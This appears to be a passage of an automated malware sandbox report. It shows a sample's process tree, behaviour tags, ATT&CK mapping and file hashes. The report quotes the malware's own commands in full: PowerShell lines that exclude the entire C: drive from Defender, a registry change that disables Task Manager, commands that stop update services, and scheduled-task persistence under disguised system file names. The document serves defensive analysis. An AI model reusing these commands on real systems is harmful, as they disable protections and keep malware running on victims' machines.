ServerComponenthostMonitorDll.exe 66 PID 2644 wrote to memory of 1556 2644 ServerComponenthostMonitorDll.exe 66 PID 2644 wrote to memory of 1400 2644 ServerComponenthostMonitorDll.exe 67 PID 2644 wrote to memory of 1400 2644 ServerComponenthostMonitorDll.exe 67 PID 2644 wrote to memory of 1400 2644 ServerComponenthostMonitorDll.exe 67 PID 2644 wrote to memory of 1788 2644 ServerComponenthostMonitorDll.exe 69 PID 2644 wrote to memory of 1788 2644 ServerComponenthostMonitorDll.exe 69 PID 2644 wrote to memory of 1788 2644 ServerComponenthostMonitorDll.exe 69 PID 2644 wrote to memory of 2412 2644 ServerComponenthostMonitorDll.exe 71 PID 2644 wrote to memory of 2412 2644 ServerComponenthostMonitorDll.exe 71 PID 2644 wrote to memory of 2412 2644 ServerComponenthostMonitorDll.exe 71 PID 2644 wrote to memory of 1108 2644 ServerComponenthostMonitorDll.exe 73 PID 2644 wrote to memory of 1108 2644 ServerComponenthostMonitorDll.exe 73 PID 2644 wrote to memory of 1108 2644 ServerComponenthostMonitorDll.exe 73 PID 2644 wrote to memory of 1312 2644 ServerComponenthostMonitorDll.exe 74 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:608
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵
- Drops desktop.ini file(s)
PID:1440
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding3⤵PID:2976
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:684
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
- Indicator Removal: Clear Windows Event Logs
PID:756
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:828
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1180
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Windows\system32\taskeng.exetaskeng.exe {537A15BC-7439-42DE-9664-B57CFC43A4C7} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
PID:2716 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:1516
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {C78BE0D0-C88F-406F-8AC5-0264D7412765} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]3⤵PID:2108
-
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe"C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe"4⤵
- Executes dropped EXE
PID:2812
-
-
C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe"C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe"4⤵
- Executes dropped EXE
PID:3032
-
-
C:\Users\All Users\Microsoft Help\Idle.exe"C:\Users\All Users\Microsoft Help\Idle.exe"4⤵
- Executes dropped EXE
PID:1416
-
-
C:\containerperf\ServerComponenthostMonitorDll.exeC:\containerperf\ServerComponenthostMonitorDll.exe4⤵
- Executes dropped EXE
PID:2040
-
-
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\cmd.exe"C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\cmd.exe"4⤵
- Executes dropped EXE
PID:2340
-
-
C:\Program Files\Windows NT\Accessories\audiodg.exe"C:\Program Files\Windows NT\Accessories\audiodg.exe"4⤵
- Executes dropped EXE
PID:2256
-
-
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe"C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe"4⤵
- Executes dropped EXE
PID:860
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:980
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:272
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:308
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1080
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1116
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:624
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1852
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2752
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1244
-
C:\Users\Admin\AppData\Local\Temp\b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exeC:\Users\Admin\AppData\Local\Temp\b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe"C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat" "5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f6⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2632
-
-
C:\containerperf\ServerComponenthostMonitorDll.exe"C:\containerperf/ServerComponenthostMonitorDll.exe"6⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n2kow1az\n2kow1az.cmdline"7⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES44DD.tmp" "c:\Windows\System32\CSC9175271B41B14A2EA1B778189E3E6F6.TMP"8⤵PID:1944
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/containerperf/'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\audiodg.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft Help\Idle.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\cmd.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\containerperf\ServerComponenthostMonitorDll.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\30syf9EvfD.bat"7⤵PID:3000
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:1984
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:376
-
-
C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe"C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\twain_32.exe"C:\Users\Admin\AppData\Local\Temp\twain_32.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:2576
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2724
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:600
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1520
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1564
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2312
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1700
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:1936 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2700 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2792
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2840
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2064
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1760
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1308
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1740
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2396
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:588
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:1028 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:1744
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:2220
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:1936
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:860
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:2964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:1664 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2224
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:2972
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Modifies data under HKEY_USERS
PID:2360
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2256
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2160
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1416
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\OSPPSVC.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1500
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\Accessories\audiodg.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2288
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows NT\Accessories\audiodg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft Help\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2264
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft Help\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft Help\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2344
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1896
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ServerComponenthostMonitorDllS" /sc MINUTE /mo 14 /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ServerComponenthostMonitorDll" /sc ONLOGON /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:784
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ServerComponenthostMonitorDllS" /sc MINUTE /mo 13 /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:956
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "109332762620666391368641376161594601744710438679-1606020817-181360311-1621960699"1⤵PID:1416
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-64050529-13265826311135633568-1565710164625305720-1982950223-541205645-2142089886"1⤵PID:2068
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1426144456-1194045333-1788322024-972468406-7718692011143336297-650040848947488710"1⤵PID:1892
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1171289986-19094382092094122751910601896-3460244319023325331249566449-51990826"1⤵PID:2836
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-99330723816306743851229039494606657611925776152-421118530-591098480-2054745108"1⤵PID:2876
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "13444458631175246456952563544634276568-63721837-194355836518828974571459342841"1⤵PID:2388
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-998118779-40381249864574749-2021583664-1690669742667890986-69411019639220884"1⤵PID:1404
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Indicator Removal
1Clear Windows Event Logs
1Modify Registry
4Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
259B
MD5f93227cd9ba821bb49011e55c0dbdf03
SHA14ff46d553c7bc5c3d550fb81560d68615e5e08c2
SHA2565bde4537d4b2810ef7f668913b5378e8e1a3c371f082a9fb1095935e7804d7e5
SHA5122bcbc5500a90e886207511ec6169dfe48903eafcba5a348ea1017ebd89b5b2106d1bb75c9835b53441a076c7d36ee29a98aa7264f073f37cf37f989927fe900a
-
Filesize
1KB
MD5782a8a45bf311033b3a7b1b0f33482c6
SHA160f3d7a4458814934582f0c5da2efe1276a488b2
SHA25643a321cad0d2e1306c6851ea0f88b951e12d510ee742c2a781ea42dbc1376762
SHA512fedf9bad47acdd7329a46360cc1f091780c9aca3f26811a7a175bd9c39f5cf6007974dd42d33c13523e3d0c702dd8ac29620273319d8a01594cc14d3314bc95e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52e48b72b759d1d41dca44d8dcd90f025
SHA19cf79e70bedf1286b6a7bce56711a98a0026c362
SHA256c8f4b39b35b14b1d5d21a23b849ec59aeccd7c081a0ee39fc57605278d5cff2c
SHA5128b5598276abb66e910421b3a1f12e45cfd8310edb101cc8050572d1e044d6767b6d166d978074fc3025fa8199468110541812d727ab80e18d51ce5cfa20476cb
-
Filesize
3KB
MD50dadc6f45f1b7a298015ee64bc77ba6f
SHA1b82afce3a7b247e26ee5fb50fbf670985be7f36d
SHA256ae3961127f85ced561b81916a5b0df241853c8c6bcc93bd2252b0d3423fda1f7
